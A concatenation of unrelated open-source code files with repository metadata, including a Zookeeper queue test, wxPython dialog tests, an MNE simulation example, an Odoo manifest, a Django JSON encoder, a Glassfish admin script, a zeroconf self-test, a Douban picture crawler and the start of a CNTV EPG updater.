' default queue backend server port (e.g: 2181)'),
cfg.StrOpt(
'mod_san_queue_path', default='/mod_san_queue', help='Zookeeper path '
'for mod_san_queue'),
]
AKAMAI_GROUP = 'drivers:provider:akamai'
class TestModSanQueue(base.TestCase):
def setUp(self):
super(TestModSanQueue, self).setUp()
self.cert_obj_json = {
"cert_type": "san",
"domain_name": "www.abc.com",
"flavor_id": "premium"
}
# Need this fake class bc zake's fake client
# does not take any host parameters
class fake_kz_client(fake_client.FakeClient):
def __init__(self, hosts):
super(self.__class__, self).__init__()
zookeeper_client_patcher = mock.patch(
'kazoo.client.KazooClient',
fake_kz_client
)
zookeeper_client_patcher.start()
self.addCleanup(zookeeper_client_patcher.stop)
self.conf = cfg.ConfigOpts()
self.zk_queue = zookeeper_queue.ZookeeperModSanQueue(self.conf)
def test_enqueue_mod_san_request(self):
self.zk_queue.enqueue_mod_san_request(
json.dumps(self.cert_obj_json).encode('utf-8'))
self.assertTrue(len(self.zk_queue.mod_san_queue_backend) == 1)
self.assertTrue(
json.loads(self.zk_queue.mod_san_queue_backend.get().
decode('utf-8')) == self.cert_obj_json)
def test_dequeue_mod_san_request(self):
self.zk_queue.enqueue_mod_san_request(
json.dumps(self.cert_obj_json).encode('utf-8'))
res = self.zk_queue.dequeue_mod_san_request(False).decode('utf-8')
self.assertTrue(len(self.zk_queue.mod_san_queue_backend) == 1)
self.assertTrue(json.loads(res) == self.cert_obj_json)
res = self.zk_queue.dequeue_mod_san_request().decode('utf-8')
self.assertTrue(len(self.zk_queue.mod_san_queue_backend) == 0)
self.assertTrue(json.loads(res) == self.cert_obj_json)
def test_traverse_queue(self):
self.zk_queue.enqueue_mod_san_request(
json.dumps(self.cert_obj_json).encode('utf-8'))
res = self.zk_queue.traverse_queue()
self.assertTrue(len(res) == 1)
res = [json.loads(r.decode('utf-8')) for r in res]
self.assertTrue(res == [self.cert_obj_json])
def test_traverse_queue_multiple_records(self):
# Get a list of records to enqueue
cert_obj_list = []
for i in range(10):
cert_obj = {
"cert_type": "san",
"domain_name": "www.abc%s.com" % str(i),
"flavor_id": "premium",
"validate_service": False
}
cert_obj_list.append(cert_obj)
for cert_obj in cert_obj_list:
self.zk_queue.enqueue_mod_san_request(
json.dumps(cert_obj).encode('utf-8'))
res = self.zk_queue.traverse_queue()
self.assertTrue(len(res) == 10)
res = [json.loads(r.decode('utf-8')) for r in res]
self.assertTrue(res == cert_obj_list)
def test_put_queue_data(self):
res = self.zk_queue.put_queue_data([])
self.assertTrue(len(res) == 0)
cert_obj_list = []
for i in range(10):
cert_obj = {
"cert_type": "san",
"domain_name": "www.abc%s.com" % str(i),
"flavor_id": "premium"
}
cert_obj_list.append(cert_obj)
self.zk_queue.put_queue_data(
[json.dumps(o).encode('utf-8') for o in cert_obj_list])
self.assertTrue(len(self.zk_queue.mod_san_queue_backend) == 10)
res = self.zk_queue.traverse_queue()
res = [json.loads(r.decode('utf-8')) for r in res]
self.assertTrue(res == cert_obj_list)
# test put data to non-empty queue
# should replace all items added above
self.zk_queue.put_queue_data(
[json.dumps(o).encode('utf-8') for o in cert_obj_list])
self.assertTrue(len(self.zk_queue.mod_san_queue_backend) == 10)
| apache-2.0 | -7,805,028,341,830,593,000 | 36.179856 | 78 | 0.601974 | false |
hamishmb/wxfixboot | Tests/Tools/DialogToolsTests.py | 1 | 3102 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# DialogTools tests for WxFixBoot Version 2.0.3
# This file is part of WxFixBoot.
# Copyright (C) 2013-2018 Hamish McIntyre-Bhatty
# WxFixBoot is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 3 or,
# at your option, any later version.
#
# WxFixBoot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with WxFixBoot. If not, see <http://www.gnu.org/licenses/>.
#Do future imports to prepare to support python 3. Use unicode strings rather than ASCII strings, as they fix potential problems.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
#Import modules
import unittest
import wx
import time
#NOTE: Assumed imports for the code under test - the project's test runner may
#provide these names differently.
import Tools.dialogtools
from Tools.dialogtools import DialogTools
class TestPanel(wx.Panel):
def __init__(self, parent):
"""Initialises the panel"""
wx.Panel.__init__(self, parent=parent)
self.frame = parent
class TestWindow(wx.Frame):
def __init__(self):
"""Initialises TestWindow"""
wx.Frame.__init__(self, parent=None, title="WxFixBoot Tests", size=(1,1), style=wx.SIMPLE_BORDER)
#No need for assertions, we're just making sure the functions run without errors here.
class TestShowThreadDlgs(unittest.TestCase):
def setUp(self):
self.app = wx.App()
self.Frame = TestWindow()
self.Panel = TestPanel(self.Frame)
Tools.dialogtools.ParentWindow = self
def tearDown(self):
del Tools.dialogtools.ParentWindow
self.Panel.Destroy()
del self.Panel
self.Frame.Destroy()
del self.Frame
self.app.Destroy()
del self.app
def testMsgDlg(self):
DialogTools().ShowThreadMsgDlg("Test message from WxFixBoot")
def testYesNoDlg(self):
DialogTools().ShowThreadYesNoDlg("Test message from WxFixBoot. Click Yes")
DialogTools().ShowThreadYesNoDlg("Test message from WxFixBoot. Click No")
DialogTools().ShowThreadYesNoDlg("Test message from WxFixBoot. Click either button. If you can see this part of the message, custom buttons aren't supported on your system", buttons=("Yay", "Nay"))
def testChoiceDlg(self):
DialogTools().ShowThreadChoiceDlg("Test message from WxFixBoot. What do programmers convert into software? Select \"Pizza & Caffeine\"", choices=["Cheese & Milk", "Pizza & Caffeine", "Dry Bread & Water"])
DialogTools().ShowThreadChoiceDlg("Test message from WxFixBoot. Select \"Turtles\"", choices=["Turtles", "Tortoises", "Terrapins"])
def testTextEntryDlg(self):
DialogTools().ShowThreadTextEntryDlg("Test message from WxFixBoot. Type \"Linux\"")
def testSaveFileDlg(self):
DialogTools().ShowThreadSaveFiledlg("Test message from WxFixBoot. Enter a path and filename.")
| gpl-3.0 | 2,059,863,111,196,046,300 | 39.815789 | 212 | 0.706641 | false |
drammock/mne-python | examples/simulation/simulate_evoked_data.py | 6 | 2810 | """
==============================
Generate simulated evoked data
==============================
Use :func:`~mne.simulation.simulate_sparse_stc` to simulate evoked data.
"""
# Author: Daniel Strohmeier <[email protected]>
# Alexandre Gramfort <[email protected]>
#
# License: BSD (3-clause)
import numpy as np
import matplotlib.pyplot as plt
import mne
from mne.datasets import sample
from mne.time_frequency import fit_iir_model_raw
from mne.viz import plot_sparse_source_estimates
from mne.simulation import simulate_sparse_stc, simulate_evoked
print(__doc__)
###############################################################################
# Load real data as templates:
data_path = sample.data_path()
raw = mne.io.read_raw_fif(data_path + '/MEG/sample/sample_audvis_raw.fif')
proj = mne.read_proj(data_path + '/MEG/sample/sample_audvis_ecg-proj.fif')
raw.info['projs'] += proj
raw.info['bads'] = ['MEG 2443', 'EEG 053'] # mark bad channels
fwd_fname = data_path + '/MEG/sample/sample_audvis-meg-eeg-oct-6-fwd.fif'
ave_fname = data_path + '/MEG/sample/sample_audvis-no-filter-ave.fif'
cov_fname = data_path + '/MEG/sample/sample_audvis-cov.fif'
fwd = mne.read_forward_solution(fwd_fname)
fwd = mne.pick_types_forward(fwd, meg=True, eeg=True, exclude=raw.info['bads'])
cov = mne.read_cov(cov_fname)
info = mne.io.read_info(ave_fname)
label_names = ['Aud-lh', 'Aud-rh']
labels = [mne.read_label(data_path + '/MEG/sample/labels/%s.label' % ln)
for ln in label_names]
###############################################################################
# Generate source time courses from 2 dipoles and the corresponding evoked data
times = np.arange(300, dtype=np.float64) / raw.info['sfreq'] - 0.1
rng = np.random.RandomState(42)
def data_fun(times):
"""Function to generate random source time courses"""
return (50e-9 * np.sin(30. * times) *
np.exp(- (times - 0.15 + 0.05 * rng.randn(1)) ** 2 / 0.01))
stc = simulate_sparse_stc(fwd['src'], n_dipoles=2, times=times,
random_state=42, labels=labels, data_fun=data_fun)
###############################################################################
# Generate noisy evoked data
picks = mne.pick_types(raw.info, meg=True, exclude='bads')
iir_filter = fit_iir_model_raw(raw, order=5, picks=picks, tmin=60, tmax=180)[1]
nave = 100 # simulate average of 100 epochs
evoked = simulate_evoked(fwd, stc, info, cov, nave=nave, use_cps=True,
iir_filter=iir_filter)
###############################################################################
# Plot
plot_sparse_source_estimates(fwd['src'], stc, bgcolor=(1, 1, 1),
opacity=0.5, high_resolution=True)
plt.figure()
plt.psd(evoked.data[0])
evoked.plot(time_unit='s')
| bsd-3-clause | -2,156,848,165,290,073,300 | 35.025641 | 79 | 0.588256 | false |
loco-odoo/localizacion_co | openerp/addons-extra/l10n_co_account/__openerp__.py | 3 | 1860 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
#    Copyright (C) 2015 I.A.S. INGENIERÍA, APLICACIONES Y SOFTWARE Johan Alejandro Olano (<http://www.ias.com.co>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
"name": "Colombian Accounting Localization Basics by I.A.S. INGENIERÍA, APLICACIONES Y SOFTWARE",
"version": "1.0",
"description": """
Profile and basics to colombian accounting localization
Localización contable y tributaria básica para Colombia
""",
"author": "I.A.S. Ingenieria, Aplicaciones y Software",
"website": "http://www.ias.com.co",
"category": "Localisation/Profile",
"depends": [
"account_chart",
"account_payment",
"l10n_co_chart",
"l10n_co_vat",
"base_translate_tools",
"base_table",
],
"data":[
"account_data.xml",
"account_report.xml",
"invoice_view.xml",
],
"demo_xml": [
],
"update_xml": [
],
"active": False,
"installable": True,
"certificate" : "",
'images': [],
}
| agpl-3.0 | -7,525,978,906,629,870,000 | 34.018868 | 119 | 0.596983 | false |
intelie/django-yajf | yajf/encoder.py | 1 | 2669 | # -*- coding: utf-8 -*-
import json
from django.utils.functional import Promise
from django.db.models.query import QuerySet
from django.utils.encoding import force_text
from django.utils import six, timezone
import datetime
from datetime import timedelta
import decimal
import uuid
class FakeFloat(float):
"""
Float subclass designed to hold Decimal values
and keep its precision to the json module.
"""
def __init__(self, value):
self.value = value
def __repr__(self):
s = str(self.value)
return s.rstrip('0').rstrip('.') if '.' in s else s
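# Illustrative note (not part of the original module): FakeFloat defers repr()
# to the wrapped value, so on encoder paths that format floats via repr() a
# Decimal keeps its textual form, e.g.
#   repr(FakeFloat(decimal.Decimal("9.90"))) == "9.9"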
class JSONEncoder(json.JSONEncoder):
"""
JSONEncoder subclass that knows how to encode date/time/timedelta,
decimal types, generators and other basic python objects.
Taken from https://github.com/tomchristie/django-rest-framework/blob/master/rest_framework/utils/encoders.py
"""
def default(self, obj):
# For Date Time string spec, see ECMA 262
# http://ecma-international.org/ecma-262/5.1/#sec-15.9.1.15
if isinstance(obj, Promise):
return force_text(obj)
elif isinstance(obj, datetime.datetime):
representation = obj.isoformat()
if obj.microsecond:
representation = representation[:23] + representation[26:]
if representation.endswith('+00:00'):
representation = representation[:-6] + 'Z'
return representation
elif isinstance(obj, datetime.date):
return obj.isoformat()
elif isinstance(obj, datetime.time):
if timezone and timezone.is_aware(obj):
raise ValueError("JSON can't represent timezone-aware times.")
representation = obj.isoformat()
if obj.microsecond:
representation = representation[:12]
return representation
elif isinstance(obj, timedelta):
return six.text_type(timedelta.total_seconds(obj))
elif isinstance(obj, decimal.Decimal):
# Serializers will coerce decimals to strings by default.
return FakeFloat(obj)
elif isinstance(obj, uuid.UUID):
return six.text_type(obj)
elif isinstance(obj, QuerySet):
return tuple(obj)
elif hasattr(obj, 'tolist'):
# Numpy arrays and array scalars.
return obj.tolist()
elif hasattr(obj, '__getitem__'):
try:
return dict(obj)
            except Exception:
pass
elif hasattr(obj, '__iter__'):
return tuple(item for item in obj)
return super(JSONEncoder, self).default(obj)
| gpl-3.0 | -1,537,054,328,288,086,800 | 35.067568 | 112 | 0.61671 | false |
nameoftherose/python-zeroconf | examples/self_test.py | 8 | 1605 | #!/usr/bin/env python
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import socket
import sys
from zeroconf import __version__, ServiceInfo, Zeroconf
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
if len(sys.argv) > 1:
assert sys.argv[1:] == ['--debug']
logging.getLogger('zeroconf').setLevel(logging.DEBUG)
# Test a few module features, including service registration, service
# query (for Zoe), and service unregistration.
print("Multicast DNS Service Discovery for Python, version %s" % (__version__,))
r = Zeroconf()
print("1. Testing registration of a service...")
desc = {'version': '0.10', 'a': 'test value', 'b': 'another value'}
info = ServiceInfo("_http._tcp.local.",
"My Service Name._http._tcp.local.",
socket.inet_aton("127.0.0.1"), 1234, 0, 0, desc)
print(" Registering service...")
r.register_service(info)
print(" Registration done.")
print("2. Testing query of service information...")
print(" Getting ZOE service: %s" % (
r.get_service_info("_http._tcp.local.", "ZOE._http._tcp.local.")))
print(" Query done.")
print("3. Testing query of own service...")
info = r.get_service_info("_http._tcp.local.", "My Service Name._http._tcp.local.")
assert info
print(" Getting self: %s" % (info,))
print(" Query done.")
print("4. Testing unregister of service information...")
r.unregister_service(info)
print(" Unregister done.")
r.close()
| lgpl-2.1 | 6,033,828,405,536,089,000 | 39.125 | 87 | 0.619315 | false |
rcrowder/nupic | examples/opf/experiments/multistep/hotgym_best_sp_5step/description.py | 10 | 3246 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
## This file defines parameters for a prediction experiment.
import os
from nupic.frameworks.opf.exp_description_helpers import importBaseDescription
# the sub-experiment configuration
config = \
{ 'modelParams': { 'clParams': { 'verbosity': 0},
'inferenceType': 'NontemporalMultiStep',
'sensorParams': { 'encoders': { 'consumption': { 'clipInput': True,
'fieldname': u'consumption',
'n': 28,
'name': u'consumption',
'type': 'AdaptiveScalarEncoder',
'w': 21},
'timestamp_dayOfWeek': { 'dayOfWeek': ( 21,
3),
'fieldname': u'timestamp',
'name': u'timestamp_dayOfWeek',
'type': 'DateEncoder'},
'timestamp_timeOfDay': { 'fieldname': u'timestamp',
'name': u'timestamp_timeOfDay',
'timeOfDay': ( 21,
1),
'type': 'DateEncoder'},
'timestamp_weekend': None},
'verbosity': 0},
'spParams': { },
'tmParams': { 'activationThreshold': 13,
'minThreshold': 9,
'verbosity': 0}}}
mod = importBaseDescription('../hotgym/description.py', config)
locals().update(mod.__dict__)
| agpl-3.0 | -1,626,276,287,187,717,600 | 58.018182 | 107 | 0.401725 | false |
kbase/trees | service/glassfish_administer_service.py | 3 | 12951 | #!/usr/bin/env python
'''
Created on Dec 6, 2013
@author: [email protected]
'''
from __future__ import print_function
from argparse import ArgumentParser
import subprocess
import os
import xml.etree.ElementTree as ET
import urllib2
from subprocess import CalledProcessError
import sys
_PARALLEL_GC = "-XX:-UseParallelGC"
_PARALLEL_GC_ESC = "-XX\:-UseParallelGC"
def _parseArgs():
parser = ArgumentParser(description='script to administer a Glassfish ' +
' application.')
parser.add_argument('-w', '--war',
help='path to the application WAR file. If ' +
'omitted, the service at the port and domain is ' +
'stopped.')
parser.add_argument('-a', '--admin', required=True,
help='location of the Glassfish asadmin program.')
parser.add_argument('-d', '--domain', required=True,
help='name of the Glassfish domain where the ' +
'application is or will be installed.')
parser.add_argument('-l', '--domain-dir',
help='directory where the glassfish domain ' +
'information and logs will be stored. Defaults to ' +
'glassfish/domains.')
parser.add_argument('-p', '--port', required=True, type=int,
help='the port where the application runs.')
parser.add_argument('-t', '--threads', type=int, default=20,
help='the number of threads for the application.')
parser.add_argument('-s', '--Xms', type=int,
help='minimum memory for the domain in MB. ' +
'This will cause a domain restart if changed.')
parser.add_argument('-x', '--Xmx', type=int,
help='maximum memory for the domain in MB. ' +
'This will cause a domain restart if changed.')
parser.add_argument('-r', '--properties', nargs='*',
help='JVM system properties to add to the server.')
parser.add_argument('--set', nargs='*',
help='Set glassfish configuration attribute (ie asadmin set ...).')
parser.add_argument('-g', '--noparallelgc', action='store_true',
help='permanently turn off the parallel garbage ' +
                        'collector and use the standard gc.')
return parser.parse_args()
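# Example invocation (illustrative only; the asadmin path, domain name, ports
# and WAR file below are placeholders, not values taken from this repository):
#   ./glassfish_administer_service.py -a ~/glassfish4/bin/asadmin -d mydomain \
#       -l ~/glassfish_domains -p 7058 -t 20 -s 512 -x 1024 -w service.war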
class CommandGlassfishDomain(object):
def __init__(self, asadminpath, domain, domainpath):
self.asadminpath = asadminpath
self.domain = domain
self.path = None
if (domainpath):
domaindir = os.path.abspath(os.path.expanduser(domainpath))
if not os.path.isdir(domaindir):
if not os.path.exists(domaindir):
os.mkdir(domaindir)
else:
print('Domain path ' + domainpath + ' must be a directory')
sys.exit(1)
self.path = domaindir
p = (' at ' + self.path) if(self.path) else ''
if self.exists():
print('Domain ' + self.domain + ' exists' + p +
', skipping creation')
else:
print('Creating domain ' + self.domain + p)
print(self._run_local_command('create-domain', '--nopassword=true',
self.domain).rstrip())
self.adminport = self.get_admin_port()
self.start_domain()
def get_admin_port(self):
#the fact I have to do this is moronic
if (self.path):
domains = self.path
else:
bindir = os.path.dirname(self.asadminpath)
glassfish = os.path.join(bindir, "..")
domains = os.path.join(glassfish, "domains")
domain = os.path.join(domains, self.domain)
configfile = os.path.join(domain, "config/domain.xml")
xml = ET.parse(configfile)
root = xml.getroot()
config = root.findall("./configs/config[@name='server-config']")[0]
adminlist = config.findall(
"./network-config/network-listeners/network-listener[@protocol=" +
"'admin-listener']")[0]
return adminlist.attrib['port']
def start_domain(self):
if self.is_running():
print ("Domain " + self.domain + " is already running on port " +
self.adminport)
else:
print("Starting domain " + self.domain)
print(self._run_local_command('start-domain', self.domain)
.rstrip())
self.adminport = self.get_admin_port()
def restart_domain(self):
if self.is_running():
print("Restarting " + self.domain + ", please wait")
print(self._run_local_command('restart-domain', self.domain)
.rstrip())
else:
self.start_domain()
def exists(self):
return self.domain in self._list_domains()
def is_running(self):
return self.domain + " running" in self._list_domains()
def start_service(self, war, port, threads):
portstr = str(port)
threadstr = str(threads)
if 'server-' + portstr in self._run_remote_command(
'list-virtual-servers'):
print("Virtual server already exists")
else:
print(self._run_remote_command(
'create-virtual-server', '--hosts',
'${com.sun.aas.hostName}', 'server-' + portstr).rstrip())
if 'thread-pool-' + portstr in self._run_remote_command(
'list-threadpools', 'server'):
print("Threadpool already exists")
else:
print(self._run_remote_command(
'create-threadpool', '--maxthreadpoolsize=' + threadstr,
'--minthreadpoolsize=' + threadstr, 'thread-pool-' + portstr)
.rstrip())
if 'http-listener-' + portstr in self._run_remote_command(
'list-http-listeners'):
print('Http listener already exists')
else:
print(self._run_remote_command(
'create-http-listener', '--listeneraddress', '0.0.0.0',
'--listenerport', portstr,
'--default-virtual-server', 'server-' + portstr,
'--securityEnabled=false', '--acceptorthreads=' + threadstr,
'http-listener-' + portstr).rstrip())
print(self._run_remote_command(
'set', 'server.network-config.network-listeners.' +
'network-listener.http-listener-' + portstr +
'.thread-pool=thread-pool-' + portstr).rstrip())
print(self._run_remote_command(
'set', 'server.network-config.protocols.protocol.' +
'http-listener-' + portstr + '.http.timeout-seconds=1800')
.rstrip())
if 'app-' + portstr in self._run_remote_command('list-applications'):
print(self._run_remote_command('undeploy', 'app-' + portstr)
.rstrip())
print(self._run_remote_command(
'deploy', '--virtualservers', 'server-' + portstr,
'--contextroot', '/', '--name', 'app-' + portstr, war).rstrip())
try:
urllib2.urlopen('http://localhost:' + portstr)
except urllib2.HTTPError as h:
resp = h.read()
else:
print('Unexpected response from server - the server did not ' +
'start up successfully. Please check the glassfish logs.')
return False
if '32603' in resp:
print('The server failed to start up successfully and is ' +
'running in protected mode. Please check the system and ' +
'glassfish logs.')
return False
elif '32300' in resp:
print('The server started successfully.')
return True
else:
print('The server failed to start up successfully and is not '
+ 'running. Please check the system and glassfish logs.')
return False
def stop_service(self, port):
portstr = str(port)
if 'app-' + portstr in self._run_remote_command('list-applications'):
print(self._run_remote_command('undeploy', 'app-' + portstr)
.rstrip())
if 'http-listener-' + portstr in self._run_remote_command(
'list-http-listeners'):
print(self._run_remote_command(
'delete-http-listener', 'http-listener-' + portstr).rstrip())
if 'http-listener-' + portstr in self._run_remote_command(
'list-protocols'):
print(self._run_remote_command(
'delete-protocol', 'http-listener-' + portstr).rstrip())
if 'thread-pool-' + portstr in self._run_remote_command(
'list-threadpools', 'server'):
print(self._run_remote_command(
'delete-threadpool', 'thread-pool-' + portstr).rstrip())
if 'server-' + portstr in self._run_remote_command(
'list-virtual-servers'):
print(self._run_remote_command(
'delete-virtual-server', 'server-' + portstr).rstrip())
def set_min_max_memory(self, minm, maxm):
# will restart the domain if changes are necessary
xmx = []
xms = []
for o in self._run_remote_command('list-jvm-options').split('\n'):
if o.startswith('-Xmx'):
xmx.append(o)
if o.startswith('-Xms'):
xms.append(o)
if (len(xms) > 1 and minm is None):
print('WARNING: multiple Xms parameters set on service: ' +
str(xms))
if (len(xmx) > 1 and maxm is None):
print('WARNING: multiple Xmx parameters set on service: ' +
str(xmx))
changed = self._set_memory(None if minm is None else '-Xms' +
str(minm) + 'm', xms)
changed2 = self._set_memory(None if maxm is None else '-Xmx'
+ str(maxm) + 'm', xmx)
if changed or changed2:
self.restart_domain()
def stop_parallel_gc(self):
for o in self._run_remote_command('list-jvm-options').split('\n'):
if o == _PARALLEL_GC:
return
self.create_jvm_option(_PARALLEL_GC_ESC)
self.restart_domain()
def create_property(self, prop):
print('Creating property ' + prop)
print(self._run_remote_command('create-system-properties', prop)
.rstrip())
def create_jvm_option(self, prop):
print('Creating jvm property ' + prop)
print(self._run_remote_command('create-jvm-options', prop)
.rstrip())
def set_glassfish_config_option(self, prop):
print('Setting glassfish configuration option ' + prop)
print(self._run_remote_command('set', prop)
.rstrip())
def _set_memory(self, memstr, memlist):
if (memstr is not None and [memstr] != memlist):
print("Removing options " + str(memlist))
for o in memlist:
self._remove_option(o)
print("Setting option " + memstr)
self._set_option(memstr)
return True
else:
return False
def _set_option(self, opt):
self._run_remote_command('create-jvm-options', opt)
def _remove_option(self, opt):
self._run_remote_command('delete-jvm-options', opt)
def _list_domains(self):
return self._run_local_command('list-domains')
def _run_local_command(self, subcmd, *args):
cmd = [self.asadminpath, subcmd]
if (self.path):
cmd.extend(['--domaindir', self.path])
try:
return subprocess.check_output(cmd + list(args))
except CalledProcessError as cpe:
print(cpe.output.rstrip())
sys.exit(1)
def _run_remote_command(self, *cmd):
try:
return subprocess.check_output([self.asadminpath, '-p',
self.adminport] + list(cmd))
except CalledProcessError as cpe:
print(cpe.output.rstrip())
sys.exit(1)
if __name__ == '__main__':
args = _parseArgs()
gf = CommandGlassfishDomain(args.admin, args.domain, args.domain_dir)
if (args.war == None):
gf.stop_service(args.port)
else:
if (args.noparallelgc):
gf.stop_parallel_gc()
gf.set_min_max_memory(args.Xms, args.Xmx)
        if args.properties is not None:
            for p in args.properties:
                gf.create_property(p)
if args.set is not None:
for s in args.set:
gf.set_glassfish_config_option(s)
success = gf.start_service(args.war, args.port, args.threads)
if not success:
sys.exit(1)
| mit | -5,904,721,624,878,219,000 | 41.048701 | 92 | 0.54436 | false |
yangdw/repo.python | src/project/web-crawler/douban_WebCrawler.py | 2 | 2988 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import os
import re
import time
import random
import urllib,urllib2
def download_picture( pictrue_url , title ):
''' '''
path = r'E:\douban'+os.sep+title+os.sep
if not os.path.exists(path):
os.makedirs(path)
file_path = path+pictrue_url.split('/')[-1]
if os.path.isfile(file_path):
return
time.sleep(3+random.random()*2)
data = urllib.urlretrieve(pictrue_url,file_path)
def deal_path(path):
    '''
    Replace characters that are not allowed in Windows file names (/\:*?<>|") with underscores.
    '''
if path.count('/'):
path = path.replace('/','_')
if path.count('\\'):
        path = path.replace('\\','_')
if path.count(r':'):
path = path.replace(r':','_')
if path.count(r'*'):
path = path.replace(r'*','_')
if path.count(r'?'):
path = path.replace(r'?','_')
if path.count(r'<'):
path = path.replace(r'<','_')
if path.count(r'>'):
path = path.replace(r'>','_')
if path.count(r'|'):
path = path.replace(r'|','_')
return path
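# Equivalent compact form of the replacements above (illustrative sketch only,
# not used by this script):
#   path = re.sub(r'[/\\:*?<>|]', '_', path)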
def work( url ):
    '''Download the page at `url`, find the picture URL and the album progress,
    download the picture, and if the album is not finished yet, recurse on the
    next page URL.'''
## req_header={'User-Agent':'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',
## 'Accept':'text/html;q=0.9,*/*;q=0.8',
## 'Accept-Charset':'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
## 'Accept-Encoding':'gzip',
## 'Connection':'close',
##                  'Referer':None # Note: if fetching still fails, try setting this to the target site's host
## }
## req_timeout=5
## req=urllib2.Request(url,None,req_header)
## resp=urllib2.urlopen(url,None,req_timeout)
resp = urllib2.urlopen( url )
data = resp.read()
#print data
title = re.findall("<title>\n*?.*?\n*?</title>", data)[0].split('\n')[1].decode('utf-8').strip()
print title
title = deal_path(title)
print title
progress = re.findall('<span class="ll">第\d*?张 / 共\d*?张</span>',data)[0].decode('utf-8')
progress = re.findall('\d*?张'.decode('utf-8'),progress)
print progress,'Be finished?',progress[0]==progress[1]
picture_url = re.findall('<div style="text-align:center">.*?</div>',data,re.S)[0]
picture_url = re.findall('<img .*? />',picture_url)[0].split('"')[1]
print picture_url
download_picture( picture_url , title )
next_url = re.findall('<link rel="next".*?/>',data)[0].split('"')[3]
print next_url
if progress[0]!=progress[1]:
work( next_url )
if __name__ == '__main__':
'''
get first url from .txt file
for each url get pictures
'''
print 'start'
douban_urls = open(r'E:\douban\urls.txt','r')
first_url = douban_urls.readline()
while first_url:
work(first_url.strip())
first_url = douban_urls.readline()
print 'end'
| mit | 547,430,320,940,881,860 | 29.842105 | 135 | 0.55529 | false |
caasiu/xbmc-addons-chinese | plugin.video.cntv-live/epgservice.py | 8 | 6351 | # -*- coding: utf-8 -*-
import xbmc
import xbmcaddon
import datetime
import re
import shutil
import traceback
import urllib2
addon = xbmcaddon.Addon(id="plugin.video.cntv-live")
addon_path = xbmc.translatePath(addon.getAddonInfo("path"))
def updateChannel(fHandle, channelID, channelName):
try:
print("Updating channel " + channelID)
dateInChina = (datetime.datetime.utcnow() + datetime.timedelta(hours=8)).replace(hour=0, minute=0) #UTC +0800
localTZ = datetime.datetime.now() - datetime.datetime.utcnow() #UTC + how much?
tzOffset = localTZ - datetime.timedelta(hours=8) #how much ahead of China
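        # Worked example (illustrative): in a UTC+1 locale localTZ is roughly +1h,
        # so tzOffset is about -7h and a programme listed at 08:00 China time is
        # written to the EPG as 01:00 local time.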
#Get data
request = urllib2.Request("http://tv.cntv.cn/index.php?action=epg-list&date=" + dateInChina.strftime("%Y-%m-%d") + "&channel=" + channelID)
request.add_header("Referer", "http://tv.cntv.cn/epg")
resp = urllib2.urlopen(request)
data = resp.read().decode("utf-8")
match = re.compile('<dd(?: class="cur1")?>(.+?)</dd>', re.DOTALL).findall(data)
#Process data
programmes = []
for entry in match:
linkValue = re.compile('>(.+?)<', re.DOTALL).search(entry).group(1) #Wow... There's actually a syntax error in the page.
timeString = linkValue[:linkValue.index(" ")]
entryTime = dateInChina.replace(hour=int(timeString[:timeString.index(":")]), minute=int(timeString[timeString.index(":") + 1:]))
entryName = linkValue[linkValue.index(" ") + 1:]
programmes.append((entryTime, entryName))
#Write channel data
fHandle.write('<channel id="{0}">\n'.format(channelID))
fHandle.write('<display-name lang="cn">{0}</display-name>\n'.format(channelName))
fHandle.write('</channel>\n'.format(channelID))
#Write programme data
for i in range(len(programmes)):
entry = programmes[i]
startTime = entry[0]
if i < len(programmes) - 1: #EAFP is too hard.
stopTime = programmes[i + 1][0]
else:
stopTime = dateInChina + datetime.timedelta(days=1)
#Convert to local time zone
startTime = startTime + tzOffset
stopTime = stopTime + tzOffset
fHandle.write('<programme start="{0}" stop="{1}" channel="{2}">\n'.format(formatDate(startTime), formatDate(stopTime), channelID))
fHandle.write('<title lang="cn">{0}</title>\n'.format(entry[1].encode("utf-8")))
fHandle.write('</programme>\n')
except Exception:
print(traceback.format_exc())
def formatDate(obj):
return obj.strftime("%Y%m%d%H%M00")
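# Example (illustrative): formatDate(datetime.datetime(2015, 3, 7, 18, 30))
# returns "20150307183000", the timestamp layout used for the <programme>
# start/stop attributes below.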
def doUpdate():
print("Updating EPG")
try:
fHandle = open(xbmc.translatePath("special://temp/epg2.xml"), "w")
fHandle.write('<?xml version="1.0" encoding="utf-8" ?>\n')
fHandle.write('<tv>\n')
if addon.getSetting("epgYangshi") == "true":
updateChannel(fHandle, "cctv1", "CCTV-1 综合")
updateChannel(fHandle, "cctv2", "CCTV-2 财经")
updateChannel(fHandle, "cctv3", "CCTV-3 综艺")
updateChannel(fHandle, "cctv4", "CCTV-4 (亚洲)")
